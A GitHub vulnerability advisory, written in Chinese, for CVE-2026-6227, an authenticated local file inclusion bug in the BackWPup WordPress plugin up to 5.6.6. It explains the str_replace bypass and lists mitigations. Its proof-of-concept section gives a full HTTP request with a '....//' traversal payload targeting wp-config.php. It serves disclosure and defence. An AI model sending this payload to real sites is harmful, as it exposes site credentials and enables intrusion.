Pixel-DefaultBR/CVE-2026-6227

GitHub: Pixel-DefaultBR/CVE-2026-6227

该工具为安全研究提供 BackWPup <=5.6.6 LFI 漏洞的验证方法与修复参考。

Stars: 0 | Forks: 0

# CVE-2026-6227:BackWPup 中的本地文件包含漏洞 ![CVSS](https://img.shields.io/badge/CVSS-7.2%20High-red) ![Version](https://img.shields.io/badge/BackWPup-<=%205.6.6-blue) ![Researcher](https://img.shields.io/badge/Researcher-Pixel__DefaultBR-pink) ## 摘要 BackWPup 5.6.6 及更早版本受到通过 `block_name` 参数的 `/wp-json/backwpup/v1/getblock` REST 端点进行认证的本地文件包含(LFI)漏洞影响。 该缺陷是由于遍历序列的非递归 `str_replace()` 消毒处理造成的,已在 5.6.7 版本中修复。 ## 元数据 - CVE:CVE-2026-6227 - 严重性:高 - CVSS 分数:7.2 - 影响产品:BackWPup WordPress 插件 - 影响版本:<= 5.6.6 - 修复版本:5.6.7 - 状态:已修复 - 披露日期:2026-04-13 - 研究员:Pixel_DefaultBR ## 免责声明 本仓库严格用于教育和道德安全研究。此处提供的信息旨在帮助管理员和安全团队验证其系统。请勿在未经明确书面许可的情况下对目标使用此信息。 ## 影响面 - 函数:`BackWPupHelpers::component()` - 端点:`POST /wp-json/backwpup/v1/getblock` - 参数:`block_name` - 访问级别:认证管理员(或被委派备份权限的用户) ## 根本原因分析 易受攻击的组件加载器在调用 `include()` 之前应用非递归的 `str_replace()` 消毒。这可以通过使用 crafted 遍历模式(如 `....//` 或 `..././`)被绕过,从而允许攻击者控制路径解析。 ## 影响 - 从服务器文件系统中任意包含本地 PHP 文件 - 潜在敏感数据泄露(例如 `wp-config.php`) - 在特定服务器/应用程序配置下可能实现远程代码执行 默认情况下,利用需要管理员级别的权限。如果备份权限被委派,较低权限的用户也可能利用此问题。 ## 利用前提条件 - 有效的认证 WordPress 会话 - 有效的 REST 随机数(nonce) - 管理员权限或被委托的备份权限 ## 概念验证 ### 场景:本地文件包含 1. 使用具有 BackWPup 作业权限的账户登录 WordPress。 2. 从插件 UI 触发正常请求,并使用代理拦截流量。 3. 定位一个合法的 `POST` 请求到 `/wp-json/backwpup/v1/getblock`。 4. 将 `block_name` 替换为遍历载荷。 示例请求: ``` POST /wp-json/backwpup/v1/getblock HTTP/1.1 Host: target.example.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-WP-Nonce: Cookie: wordpress_logged_in_= block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully! ``` 5. 观察响应以验证文件包含行为。 ## 时间线 - 2026-03:漏洞报告给供应商 - 2026-03-25:供应商在 5.6.7 版本中发布补丁 - 2026-04-13:公开披露(CVE-2026-6227) ## 缓解措施 - 将 BackWPup 更新到 5.6.7 或更高版本 - 限制 `backwpup` 权限的分配仅限受信任的角色 - 审查对 `/wp-json/backwpup/v1/getblock` 的可疑访问日志 ## 参考 - 供应商插件页面:https://wordpress.org/plugins/backwpup/ - CVE 参考(Wordfence):https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
标签:BackWPup, CVE-2026-6227, CVSS 7.2, LFI, OpenVAS, PHP, REST API, str_replace 绕过, WordPress 备份插件, WordPress 安全, WordPress 插件, 插件安全, 文件包含漏洞, 文件完整性监控, 本地文件包含, 漏洞分析, 漏洞复现, 组件加载, 认证绕过, 路径探测, 路径遍历, 高危漏洞